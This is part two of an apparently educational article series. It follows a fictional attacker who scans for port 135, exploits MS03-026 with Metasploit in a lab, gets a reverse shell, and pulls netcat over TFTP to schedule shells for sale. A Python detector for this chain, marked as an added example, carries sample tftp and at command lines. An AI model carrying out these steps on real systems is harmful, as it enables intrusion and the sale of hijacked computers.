Shells for Sale! (Part 2)

If you missed the previous articles in this series please read:

We left off in part one having seen John go over his tool requirements and his methodology. He knew that he could break into some computers, but he also wanted to safeguard his newly harvested victims. To that end he planned to remotely install the patch that plugs the hole he had used to get in. He thought this a fairly crafty twist, and in reality it was not a bad one: this type of activity is actually seen in the wild and has been chronicled in investigations of compromised computers. At this point John was ready to do a practice run in his computer lab. All of the work would be done on two W2K Pro VMware images, so John would not risk contaminating his own computer. He could also take as many snapshots of his images as he liked, which would let him roll back quickly if he made a mistake. With that in hand, let’s follow along as John goes about his practice run.

Time for some fun

On the first W2K Pro image John fired up the Superscan port scanner as seen below.


Figure 1

We can see that he only entered the IP address of the other W2K Pro image and otherwise kept most of Superscan’s default options. The scan, as seen below, reveals a wealth of information about the practice target.


Figure 2

We see that port 135 is indeed open and actively listening for connections on both UDP and TCP. Superscan also lists the name of the port 135 service, i.e. DCE (Distributed Computing Environment) endpoint resolution. This was the exploitable service John was after. Superscan, as we can see, is really quite nice: the screenshot above also shows some very useful NetBIOS enumeration information. We can tell what type of operating system the computer is running via the NetBIOS suffix, and who is logged on. It is very much a treasure trove of information, which is why these ports should always be firewalled off from external access.

With this information in hand John can carry on with his practice run. The first step was simply to conduct a simulated wholesale scan of a cable modem range in order to identify potential victims. It was now time to actively attack the IP addresses that had been identified.


Figure 3

For simplicity’s sake John decided to go with the Metasploit Framework. This tool had been the testbed for a lot of his experimentation with exploiting computers in his lab. You can see from the above that it is driven through a web browser. This is done by simply launching it from the Programs menu and clicking on the msfweb option. Once that is done you point your browser at the address shown in the DOS prompt that comes up: http://127.0.0.1:55555


Figure 4

From there we can see that we have to enter some other variables, such as the remote destination IP address. Several other options were chosen prior to the screenshot above, but they are pretty intuitive.


Figure 5

We can now see from the above screenshot that the W2K Pro VMware image John is practising on has been successfully exploited. You will note that the picture says “shell started on session 1”. This means that John now has a reverse command shell waiting for him; all he needs to do is click on the hyperlink “session 1”. As you may note, the Metasploit Framework is indeed a very slick tool that gives you point-and-click ability to compromise computers. The true intention of the tool, though, is to help the system administrator or other computer security professional verify the integrity of their network. It is also free, and very much the equivalent of some of its commercial counterparts.


Figure 6

Now that John has a remote cmd.exe on the practice victim, he can go ahead with the next stage of his simulated hack. This will encompass transferring several files and programs over from his TFTP server. Specifically he will transfer over the following:

  1. the hotfix patch for the MS03-026 vulnerability
  2. the win32 port of Netcat
  3. a simple batch script to invoke Netcat or nc.exe

The next step for John is to use the TFTP server running on his attacking computer to ferry over the files and programs he needs to further his exploitation of this computer.


Figure 7

We can see from the sample syntax in the screenshot how you would go about ferrying over such a file. This is done via the built-in TFTP client that ships with win32 operating systems. It is an important distinction to make: the TFTP transfer is executed from within the reverse command shell, and the files themselves are pulled from the attacker’s TFTP server. Once all the files are transferred, it is time for the next step. John issues the “time” command to find out what time it is on the victim computer relative to his own. He sees that they are in the same time zone.


Figure 8

This is important, as John will use this time comparison to know when the AT command he schedules later on should have his reverse shell come back to him at a predetermined time. Establishing the time relationship between the two computers is key for John, as he intends to customize the shells he later plans on selling to his customers. By taking the time sample he will be able to tell prospective customers when to expect their remote access to start. After all, there is little sense in having Netcat sitting there listening on your computer if you don’t know when it will receive your remote cmd.exe.
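The post-exploitation chain described above (tftp.exe pulling nc.exe and a batch file from inside the shell, then at.exe scheduling that file) is exactly what a defender should be hunting for in process-creation telemetry. The detector below is an added example, not from the original article; the Sysmon-style log format and the sample events are constructed, and the one-hour correlation window is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed, simplified process-creation events:
# timestamp | host | parent image | image | command line
SAMPLE_EVENTS = """\
2005-03-01T22:14:03|ws17|cmd.exe|tftp.exe|tftp -i 10.0.0.5 GET nc.exe
2005-03-01T22:14:09|ws17|cmd.exe|tftp.exe|tftp -i 10.0.0.5 GET run.bat
2005-03-01T22:15:40|ws17|cmd.exe|at.exe|at 23:30 C:\\WINNT\\run.bat
2005-03-02T09:01:00|ws22|cmd.exe|tftp.exe|tftp 10.0.0.9 GET config.txt
2005-03-02T09:05:00|ws22|cmd.exe|at.exe|at 18:00 backup.cmd
"""

# Extensions that should never arrive on a workstation via TFTP.
EXEC_EXT = (".exe", ".bat", ".cmd", ".com")


def parse_events(text):
    """Parse pipe-delimited events into dicts with a real datetime."""
    events = []
    for line in text.splitlines():
        ts, host, parent, image, cmdline = line.split("|", 4)
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "parent": parent.lower(), "image": image.lower(),
                       "cmdline": cmdline})
    return events


def detect_tftp_at_chain(events, window=timedelta(hours=1)):
    """Return {host: [(rule, filename), ...]} for the TFTP-then-AT pattern.

    Rule 1: tftp.exe fetching an executable or script.
    Rule 2: at.exe, within `window` on the same host, scheduling a file
            that rule 1 saw arrive (the AT time is victim-local, which is
            why the attacker in the article checks the clock first).
    """
    fetched = defaultdict(list)    # host -> [(ts, filename)]
    findings = defaultdict(list)
    for ev in sorted(events, key=lambda e: e["ts"]):
        host = ev["host"]
        if ev["image"] == "tftp.exe":
            m = re.search(r"\bget\s+(\S+)", ev["cmdline"], re.IGNORECASE)
            name = m.group(1).lower() if m else ""
            if name.endswith(EXEC_EXT):
                fetched[host].append((ev["ts"], name))
                findings[host].append(("tftp_exec_fetch", name))
        elif ev["image"] == "at.exe":
            for ts, name in fetched[host]:
                if ev["ts"] - ts <= window and name in ev["cmdline"].lower():
                    findings[host].append(("scheduled_fetched_file", name))
    return dict(findings)
```

Host ws22 fetches only a text file and schedules an unrelated job, so it produces no finding; ws17 trips both rules.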

It is at this point that we will break the article. In the last part of this series we will see how John installs the hotfix patch to guard against the potential hijacking of his newly compromised computer. Furthermore, we will see him schedule a test AT command to have his reverse command shell come back to him via his listening Netcat session. Lastly, we will see John’s eventual downfall, as he takes his newly planned hacking for dollars to the real world and quickly gets busted by the Federal police. See you in part three!
